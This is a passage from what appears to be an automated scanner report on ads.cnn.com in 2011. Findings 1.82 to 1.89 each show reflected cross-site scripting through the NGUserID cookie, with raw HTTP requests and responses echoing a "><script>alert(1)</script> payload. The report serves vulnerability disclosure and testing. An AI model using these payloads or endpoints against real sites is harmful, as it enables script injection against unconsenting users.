Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1d02ae"><script>alert(1)</script>995fc90c9d2; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:47 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:47 GMT
Pragma: no-cache
Content-Length: 2863
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
7359,47128,47457,52263,52751,52901,56058,56872,57896,58702,60072,60074,60077,60093,60443,60541,60599,61263,61421,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1d02ae"><script>alert(1)</script>995fc90c9d2%2CTIL%2C1313434014105&amp;random=bimReoe,bhesAmxdozpsA&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1d02ae"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E995fc90c9d2" width="1"
...[SNIP]...

1.82. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf9b9"><script>alert(1)</script>04bc88dd9a7 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1cf9b9"><script>alert(1)</script>04bc88dd9a7; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:44 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:44 GMT
Pragma: no-cache
Content-Length: 2820
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52751,52901,56058,56872,58702,60541,60599,61263,61421,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1cf9b9"><script>alert(1)</script>04bc88dd9a7%2CTIL%2C1313433990029&amp;random=boRcvKi,bhesAkydoyyqc&amp;Params.tag.transactionid=&amp;Params.User.UserID=aa55a22-30407-167278533-1cf9b9"%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E04bc88dd9a7" width="1"
...[SNIP]...

1.83. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50e7"><script>alert(1)</script>d0beb75a10 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1f50e7"><script>alert(1)</script>d0beb75a10; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:54 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:54 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 8021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
586,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59469,60072,60074,60077,60093,60443,60541,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-1f50e7"><script>alert(1)</script>d0beb75a10%2CTIL%2C1313434014106&Redirect=http://jobsearch.money.cnn.com/a/all-jobs/list" target="_blank">
...[SNIP]...

1.84. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dc27"><script>alert(1)</script>f60cf4c8ae5 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-16dc27"><script>alert(1)</script>f60cf4c8ae5; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3852
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52901,56058,56872,58702,59469,60541,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-16dc27"><script>alert(1)</script>f60cf4c8ae5%2CTIL%2C1313433990030&Redirect=http://www.facebook.com/cnnmoney">
...[SNIP]...

1.85. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d77"><script>alert(1)</script>4f28e65543b was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-151d77"><script>alert(1)</script>4f28e65543b; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:45 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:45 GMT
Pragma: no-cache
Content-Length: 3761
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,917,1067,1285,1589,1678,1686,1735,3458,4443,37359,47128,47457,52263,52901,56058,56872,58702,60541,60542,61263,61421,61887,61908,61913,63267,116729,116771&RawValues=NGUSERID%2Caa55a22-30407-167278533-151d77"><script>alert(1)</script>4f28e65543b%2CTIL%2C1313433990030&Redirect=http://twitter.com/money">
...[SNIP]...

1.86. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The value of the NGUserID cookie is copied into the HTML document as plain text between tags. The payload 1bc7a<script>alert(1)</script>11ae3b34584 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029234&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-11bc7a<script>alert(1)</script>11ae3b34584; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:48:15 GMT
Pragma: no-cache
Content-Length: 1474
Content-Type: text/html

callback({ "ad": { "advertiser_text": "E*TRADE","click_url": "http://ad.doubleclick.net/click;h=v2|3D51|0|0|%2a|j;234140391;0-0;0;58074575;31-1|1;39756396|39774183|1;;;pc=[TPAS_ID]%3fhttps://us.etrade
...[SNIP]...
,1285,1589,1678,1686,1735,3450,3615,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59371,60663,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-11bc7a<script>alert(1)</script>11ae3b34584%2CTIL%2C1313434014105&amp;random=bgqkjmi,bhesAppdoAnok","third_party_tracking": "http://ad.doubleclick.net/imp;v1;f;234140391;0-0;0;58074575;1|1;39756396|39774183|1;;cs=q;pc=[TPAS_ID];%3fhttp://ad.dou
...[SNIP]...

1.87. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The value of the NGUserID cookie is copied into the HTML document as plain text between tags. The payload 208aa<script>alert(1)</script>1a5425a7d2f was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029235&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1208aa<script>alert(1)</script>1a5425a7d2f; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:48:15 GMT
Pragma: no-cache
Content-Length: 1730
Content-Type: text/html

callback({ "ad": { "advertiser_text": "TD Ameritrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d384614%26AdID%3d526236%26TargetID%3d108094%26Segments%3d1869,1880,2244,2743,32
...[SNIP]...
,1285,1589,1678,1686,1735,3450,3615,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59371,60664,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-1208aa<script>alert(1)</script>1a5425a7d2f%2CTIL%2C1313434014105&amp;random=bfrvpdq,bhesAppdoAnob&amp;Params.tag.transactionid=","third_party_tracking": "http://i.cdn.turner.com/money/images/1.gif"}})

1.88. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The value of the NGUserID cookie is copied into the HTML document as plain text between tags. The payload 40d5f<script>alert(1)</script>5b6da90c020 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029236&_=1313434043147 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-140d5f<script>alert(1)</script>5b6da90c020; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:48:17 GMT
Pragma: no-cache
Content-Length: 1706
Content-Type: text/html

callback({ "ad": { "advertiser_text": "Scottrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d351447%26AdID%3d483240%26TargetID%3d108070%26Segments%3d1869,1880,2244,2743,3285,6
...[SNIP]...
,1285,1589,1678,1686,1735,3450,3615,4443,37359,47128,47457,52263,52901,56058,56872,57896,58702,59371,60665,61263,61887,61908,61913,63267,116729,116771&amp;RawValues=NGUSERID%2Caa55a22-30407-167278533-140d5f<script>alert(1)</script>5b6da90c020%2CTIL%2C1313434014105&amp;random=eARIok,bhesAprdoAobv","third_party_tracking": "http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1455.876.tk.TEXT/"}})

1.89. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 [NGUserID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e05e1"><script>alert(1)</script>d9fa763ff0e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
